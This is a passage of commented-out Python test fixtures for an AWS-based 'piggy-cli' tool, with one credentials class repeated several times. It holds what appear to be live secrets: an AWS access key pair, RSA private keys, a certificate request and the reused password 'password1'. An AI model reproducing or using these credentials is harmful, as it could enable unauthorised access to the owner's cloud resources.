JuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
